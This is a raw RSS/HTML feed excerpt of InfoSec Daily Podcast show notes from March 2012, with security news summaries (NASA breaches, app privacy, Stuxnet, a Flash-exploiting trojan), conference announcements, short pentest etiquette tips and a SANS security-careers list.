<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;text-decoration: underline;vertical-align: baseline">Stories</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://technologyspectator.com.au/security/data-security/nasa-hacked-13-times-last-year"><span>http://technologyspectator.com.au/security/data-security/nasa-hacked-13-times-last-year</span></a></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">NASA said hackers stole employee credentials and gained access to mission-critical projects last year in 13 major network breaches that could compromise US national security.</span></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">National Aeronautics and Space Administration Inspector General Paul Martin testified before Congress this week on the breaches, which appear to be among the more significant in a string of security problems for federal agencies.</span></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">The space agency discovered in November that hackers working through an Internet Protocol address in China broke into the -network of NASA&#039;s Jet Propulsion Laboratory, Martin said in testimony released on Wednesday. One of NASA&#039;s key labs, JPL manages 23 spacecraft conducting active space missions, including missions to Jupiter, Mars and Saturn.</span></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">He said the hackers gained full system access, which allowed them to modify, copy, or delete sensitive files, create new user accounts and upload hacking tools to steal user credentials and compromise other NASA systems. They were also able to modify system logs to conceal their actions.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span></p>
<p>	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><br />
	<a href="http://news.cnet.com/8301-1009_3-57390567-83/new-york-senator-asks-ftc-to-investigate-google-apple/?tag=txt;title"><span>http://news.cnet.com/8301-1009_3-57390567-83/new-york-senator-asks-ftc-to-investigate-google-apple/?tag=txt;title</span></a><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">A U.S. Senator has called on the Federal Trade Commission to investigate both Apple and Google over claims that applications running on their mobile operating systems violate user privacy.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">In a letter sent to the FTC and reported by Reuters yesterday, Sen. Charles Schumer (D-N.Y.) said recent accusations that personal information is being accessed by mobile applications goes &quot;beyond what a reasonable user understands himself to be consenting to when he allows an app to access data on the phone for purposes of the app&#039;s functionality.&quot; He asked the FTC to force smartphone makers to implement safeguards that ensure data is not being accessed without a user&#039;s expressed consent.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Both Apple and Google came under fire last month after a popular mobile application, Path, was found to be collecting user contact information without permission. After the company issued an apology, several reports cropped up, detailing how a host of other applications across both iOS and Android were accessing data without the user&#039;s expressed consent. Soon after, lawmakers sounded off on the issue.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&quot;This incident raises questions about whether Apple&#039;s iOS app developer policies and practices may fall short when it comes to protecting the information of iPhone users and their contacts,&quot; Rep. Henry A. Waxman (D-Calif.) wrote in a letter sent to Apple CEO Tim Cook last month.</span></p>
<p>	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Apple had been quick to respond, telling CNET in a statement that &quot;apps that collect or transmit a user&#039;s contact data without their prior permission are in violation of our guidelines.&quot; The company also said that a future software update to iOS 5 will prohibit developers from engaging in those activities.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">For users, the implications are at least a little worrisome. The flaws found in the operating systems pave the way for developers to access everything from contacts to photos. Allowing an app to do that is one thing, but finding out that an application is allegedly accessing it without permission is another.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Apple faced similar criticisms over iOS privacy last year when researchers found that the operating system was collecting user locations and storing them unencrypted for anyone to see. After Apple classified the issue as a &quot;bug,&quot; it updated the software to ensure data was only stored for a period of seven days and wouldn&#039;t be kept unencrypted on local machines.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">In a statement e-mailed today to CNET, Google explained itself a bit, stating how it designed Android and what it might do to address the flaw in the coming months.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&quot;We originally designed the Android photos file system similar to those of other computing platforms like Windows and Mac OS,&quot; a Google representative stated in the e-mail. &quot;At the time, images were stored on a SD card, making it easy for someone to remove the SD card from a phone and put it in a computer to view or transfer those images.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&quot;As phones and tablets have evolved to rely more on built-in, non-removable memory, we&#039;re taking another look at this and considering adding a permission for apps to access images,&quot; the spokesperson continued. &quot;We&#039;ve always had policies in place to remove any apps on Android Market that improperly access your data.&quot;</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">The FTC has so far not publicly responded to Schumer&#039;s request. Apple did not immediately respond to CNET&#039;s request today for comment on the matter.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&#8230;</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><br />
	<a href="http://news.cnet.com/8301-1009_3-57390326-83/60-minutes-profiles-threat-posed-by-stuxnet/?tag=txt;title"><span>http://news.cnet.com/8301-1009_3-57390326-83/60-minutes-profiles-threat-posed-by-stuxnet/?tag=txt;title</span></a></p>
<p>	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Stuxnet took the world by storm two years ago.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">The worm was different from previous viruses: it wasn&#039;t designed to steal money, identities, or passwords. Instead, the malware targeted the controls at industrial facilities such as power plants, inspiring talk of a top secret, government-sponsored cyberwar.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">At the time of its discovery in June 2010, the assumption was that espionage lay behind the effort, but subsequent analysis uncovered the ability of the malware to control plant operations outright&#8211;specifically an Iranian nuclear facility.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">In addition to showing that a cyberattack could cause significant physical damage to a facility, it also raised concerns that future malware, modeled after Stuxnet, could target critical infrastructure, such as power and water-treatment plants in the United States.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&quot;We have entered into a new phase of conflict in which we use a cyberweapon to create physical destruction, and in this case, physical destruction in someone else&#039;s critical infrastructure,&quot; Ret. Gen. Michael Hayden told the CBS news magazine &quot;60 Minutes&quot; this evening (see video below).</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Hayden, who is a former head of the National Security Agency and served as CIA director under President George W. Bush, says he knows more about the attack on Iran than he can publicly discuss. But he warns that there are potential problems and consequences that come with this new kind of warfare.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&quot;When you use a physical weapon it destroys itself, in addition to the target, if it&#039;s used properly,&quot; Hayden said. &quot;A cyber-weapon doesn&#039;t, so there are those out there who can take a look at this, study it and maybe even attempt to turn it to their own purposes.&quot;</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&#8230;</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><br />
	<a href="http://www.scmagazine.com/purported-iran-nuke-document-contains-trojan/article/230730/"><span>http://www.scmagazine.com/purported-iran-nuke-document-contains-trojan/article/230730/</span></a></p>
<p>	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Targeted attackers are leveraging a patched Adobe Flash vulnerability and the ongoing tension around Iran&#039;s suspected nuclear program to spread a difficult-to-detect trojan.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">According to Contagio Malware Dump, a malware sample collection site, emails are spreading that contain an attached Word document titled &quot;Iran&#039;s Oil and Nuclear Situation.&quot; Clicking on the file sets in motion a series of events that ultimately results in a malicious binary being dropped onto the target system.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&quot;The Word document contains Flash, which downloads a corrupted MP4 file,&quot; wrote Contagio IT specialist Mila Parkour in a blog posted Monday. &quot;This MP4 file causes memory corruption and code execution.&quot;</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">The attack takes advantage of a recently fixed Flash bug, CVE-2012-0754. The vulnerability was repaired, along with six others, last month when Adobe released Flash Player 11.1.102.62 for Windows, Macintosh, Linux and Solaris.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">As of Saturday afternoon EST, just seven of 42 of the most popular anti-virus products detected the malicious file, according to a VirusTotal reviewcommissioned by Contagio.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Reached by email, Parkour said &quot;someone donated the sample and sounds like a lot of them are already in circulation.&quot; An Adobe spokeswoman said the company didn&#039;t have any information about the extent of the threat.</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Meanwhile, unrelated to this latest exploit, Adobe on Monday releasedanother Flash update, version 11.1.102.63, to address two critical vulnerabilities. The flaws garnered &quot;Priority 2&quot; status under Adobe&#039;s newly launched ratings system. Priority 2 means there are no known exploits for any of the bugs being fixed, nor are attacks imminent.</span></b></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-611-nasa-gets-pwned-13x-apple-google-on-ftc-watch-list-and-more-flash-2/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3591/0/infosec-daily-podcast-episode-611.mp3" length="21583541" type="audio/mpeg" />
		<itunes:duration>0:33:37</itunes:duration>
		<itunes:subtitle>Episode 611 &#8211; NASA Gets Pwned 13x, Apple &#38; Google on FTC Watch List and More Flash
	InfoSec Daily Podcast Episode 611 for March 5, 2012. &#160;Tonight&#039;s podcast is hosted by Dave Kennedy and Boris Sverdlik
	Special guests: aricon and [...]</itunes:subtitle>
		<itunes:summary>Episode 611 &#8211; NASA Gets Pwned 13x, Apple &#38; Google on FTC Watch List and More Flash
	InfoSec Daily Podcast Episode 611 for March 5, 2012. &#160;Tonight&#039;s podcast is hosted by Dave Kennedy and Boris Sverdlik
	Special guests: aricon and Spridel
	
Announcements:
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	
Stories
Source: http://technologyspectator.com.au/security/data-security/nasa-hacked-13-times-last-year
	NASA said hackers stole employee credentials and gained access to mission-critical projects last year in 13 major network breaches that could compromise US national security.
	National Aeronautics and Space Administration Inspector General Paul Martin testified before Congress this week on the breaches, which appear to be among the more significant in a string of security problems for federal agencies.
	The space agency discovered in November that hackers working through an Internet Protocol address in China broke into the -network of NASA&#039;s Jet Propulsion Laboratory, Martin said in testimony released on Wednesday. One of NASA&#039;s key labs, JPL manages 23 spacecraft conducting active space missions, including missions to Jupiter, Mars and Saturn.
	He said the hackers gained full system access, which allowed them to modify, copy, or delete sensitive files, create new user accounts and upload hacking tools to steal user credentials and compromise other NASA systems. They were also able to modify system logs to conceal their actions.
	&#8230;
	Source: 
	http://news.cnet.com/8301-1009_3-57390567-83/new-york-senator-asks-ftc-to-investigate-google-apple/?tag=txt;title
	A U.S. Senator has called on the Federal Trade Commission to investigate both Apple and Google over claims that applications running on their mobile operating systems violate user privacy.
	In a letter sent to the FTC and reported by Reuters yesterday, Sen. Charles Schumer (D-N.Y.) said recent accusations that personal information is being accessed by mobile applications goes &#34;beyond what a reasonable user understands himself to be consenting to when he allows an app to access data on the phone for purposes of the app&#039;s functionality.&#34; He asked the FTC to force smartphone ma[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 610 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-610-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-610-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 04 Mar 2012 04:04:48 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3580</guid>
		<description><![CDATA[Episode 610 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 610 for March 3, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester. Guests: aricon, oncee, connection, and spridel &#160; Announcements: Social Engineering Training When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK [...]]]></description>
			<content:encoded><![CDATA[<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Episode 610 &#8211; Weekend Wrap-up with Dr. b0n3z</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">InfoSec Daily Podcast Episode 610 for March 3, 2012. &nbsp;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik, and Themson Mester.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Guests: aricon, oncee, connection, and spridel</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;vertical-align: baseline">Announcements:</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Social Engineering Training</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21-24, 2012<br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: August 20-24, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;November 12-16, 2012<br />
	Where: &nbsp;Columbia, MD</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">InfoSec Southwest</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: March 30-April 1</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span>http://www.Infosecsouthwest.com</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Linuxfest Northwest 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP now open!</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">AIDE 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 21-25, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: MU Forensic Science Center</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Huntington, West Virginia</span><br />
	<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">LayerOne 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 26-27, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP now open!</span></b></p>
<p>&nbsp;</p>
<h5><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></b></h5>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span> </span><span>http://www.sans.org/mentor/details.php?nid=28014</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span>http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Defcon 20</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 26-29, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span>http://defcon.org/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP &amp; Room reservations now open!</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;text-decoration: underline;vertical-align: baseline">Pentest Lessons:</span><br />
	</b></p>
<ol>
<li><b><span style="font-weight: normal;vertical-align: baseline">During a pentest, if you upload a web shell to a website, at least password protect it so someone else does not make use of it too. </span><img height="15px;" src="https://lh6.googleusercontent.com/3cp8_vujjGsI9cAtA0oHRTCtyWxJNdHuZ5wiY4Twq_9W0kpoLJEfyt2IBjbOCAP3W79tfoqOU8_-l9adgwmxdQ4k30ihPd3mTGl1x0USg7LsJ9q7Fv0" width="15px;" /></b></li>
<li><b><span style="font-weight: normal;vertical-align: baseline">If you tell the customer you will have their report on a particular date, then you better make every effort to make that deadline!</span></b></li>
<li><b><span style="font-weight: normal;vertical-align: baseline">After a pentest, make sure you clean up after yourself (i.e. do not leave the systems worse than you found them).</span></b></li>
<li><b><span style="font-weight: normal;vertical-align: baseline">Popping a server with the same account as the one you previously created, the year before, is probably more than just cheating.</span></b></li>
<li><b><span style="font-weight: normal;vertical-align: baseline">If you IP is included in the assessment scope (internal NVA/PT), make sure to remove any findings from the report that relate to your box.</span></b></li>
<li><b><span style="font-weight: normal;vertical-align: baseline">When performing a pentest, make sure that the box you are targeting is not your box (or a VM on your box).</span></b></li>
<li><b><span style="font-weight: normal;vertical-align: baseline">Always back up your pentest/assessment data. You never know when the hard-drive in your system will decide to die!</span></b></li>
</ol>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;text-decoration: underline;vertical-align: baseline">Stories</span></b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&nbsp;</span><a href="https://www.sans.org/20coolestcareers/"><span>https://www.sans.org/20coolestcareers/</span></a></b></p>
<ul>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#1 Information Security Crime Investigator/Forensics Expert</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#2 System, Network, and/or Web Penetration Tester</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#3 Forensic Analyst</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#4 Incident Responder</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#5 Security Architect</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#6 Malware Analyst</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#7 Network Security Engineer</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#8 Security Analyst</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#9 Computer Crime Investigator</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#10 CISO/ISO or Director of Security</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#11 Application Penetration Tester</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#12 Security Operations Center Analyst</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#13 Prosecutor Specializing in Information Security Crime</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#14 Technical Director and Deputy CISO</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#15 Intrusion Analyst</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#16 Vulnerability Researcher/ Exploit Developer</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#17 Security Auditor</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#18 Security-savvy Software Developer</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#19 Security Maven in an Application Developer Organization</span></b></li>
<li><b><span style="background-color: transparent;font-weight: normal;vertical-align: baseline">#20 Disaster Recovery/Business Continuity Analyst/Manager</span></b></li>
</ul>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><a href="http://animalnewyork.com/2012/02/the-department-of-homeland-security-is-searching-your-facebook-and-twitter-for-these-words/"><span> </span><span>http://animalnewyork.com/2012/02/the-department-of-homeland-security-is-searching-your-facebook-and-twitter-for-these-words/</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">The Department of Homeland Security monitors your updates on social networks, including Facebook and Twitter, to uncover &ldquo;Items Of Interest&rdquo; (IOI), according to an internal DHS document released by the EPIC. That document happens to include a list of the baseline terms for which the DHS&ndash;or more specifically, a DHS subcontractor hired to monitor social networks&ndash;use to generate real-time IOI reports. (Although the released PDF is generally all reader-selectable text, the list of names was curiously embedded as an image of text, preventing simple indexing. We&rsquo;ve fixed that below.)</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">To be fair, the DHS does have an internal privacy policy that attempts to strip your &ldquo;PII&rdquo;&ndash;Personally Identifiable Information&ndash;from the aggregated tweets and status updates, with some broad exceptions</span><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&hellip;</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://www.theregister.co.uk/2012/03/01/electronic_voting_hacked_bender/"><span>http://www.theregister.co.uk/2012/03/01/electronic_voting_hacked_bender/</span></a></b></p>
